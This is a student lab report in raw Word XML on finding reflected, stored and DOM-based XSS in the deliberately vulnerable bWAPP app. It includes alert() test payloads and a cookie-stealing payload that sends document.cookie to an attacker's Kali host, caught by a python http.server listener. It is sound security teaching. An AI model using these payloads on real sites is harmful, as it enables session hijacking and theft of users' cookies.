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VIJAY VARSITH I</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ROLL:NO:241901125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Lines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="20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EXP 12: IDENTIFY XSS VULNERABILITIES IN WEB APPLICATIONS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identify and exploit Cross-Site Scripting (XSS) vulnerabilities - Reflected, Stored, and DOM-based - in a vulnerable web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007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XSS occurs when a web application takes user input and displays it back on a page without properly sanitizing it. This lets an attacker inject JavaScript that runs in another user's browser, potentially stealing cookies, session tokens, or redirecting users to phishing pages.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Reflected XSS: payload is part of the URL/request and immediately reflected in the response.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XSS: payload is saved in the database (e.g., a comment) and served to every visitor.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DOM-based XSS: payload never touches the server — it's executed purely by client-side JavaScript.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709"/>
        </w:tabs>
        <w:spacing w:after="1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REQUIRED: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40" w:lineRule="auto"/>
        <w:ind w:left="1002" w:hanging="28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 Linux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40" w:lineRule="auto"/>
        <w:ind w:left="1002" w:hanging="28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bWAPP (has dedicated modules for all 3 XSS types) – set security to low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40" w:lineRule="auto"/>
        <w:ind w:left="1002" w:hanging="28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browser with Developer Tools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709"/>
        </w:tabs>
        <w:spacing w:after="1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14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 — Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015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Go to bWAPP → Cross-Site Scripting (Reflected) module. In the search/input field, enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:fill="e1e1e1" w:val="clear"/>
        <w:spacing w:after="283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&lt;script&gt;alert('Reflected-XSS-Test')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017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the form. A JavaScript pop-up box appears immediately — this confirms the input was reflected and executed unsanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after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 — Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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Go to bWAPP → Cross-Site Scripting (Stored) — Blog module. Post a comment with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:fill="e1e1e1" w:val="clear"/>
        <w:spacing w:after="283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&lt;script&gt;alert('Stored-XSS-Test')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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it. Now reload the page or visit it from a different browser tab — the alert fires again automatically, proving the payload is permanently stored and delivered to every visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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 — Cookie stealing demonstration (safe/lab only)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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a simple alert, inject:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:fill="e1e1e1" w:val="clear"/>
        <w:spacing w:after="283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&lt;script&gt;document.location='http://&lt;kali-ip&gt;:8000/steal?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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a listener on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:fill="e1e1e1" w:val="clear"/>
        <w:spacing w:after="283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python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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victim views the stored comment, their cookie is sent to your listener — visible in the terminal log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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 — DOM-based XSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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Go to bWAPP → Cross-Site Scripting (DOM) module. Inspect the page source/JavaScript to see how user input is written directly into the DOM (e.g., via document.write()). Enter a payload in the vulnerable parameter and observe execution without any server round-trip.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028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Reflected-XSS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07364" cy="26671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364" cy="266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Stored-XSS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43246" cy="312677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246" cy="3126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DOM-XSS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17214" cy="25991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214" cy="259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Cookie-Stealing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77804" cy="232643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804" cy="232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Reflected XSS, Stored XSS, and DOM-based XSS vulnerabilities were successfully identified and demonstrated in the bWAPP vulnerable web application using JavaScript test payloads.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02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711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420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3129" w:hanging="283.00000000000045"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3838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547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5256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965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674" w:hanging="282.0000000000009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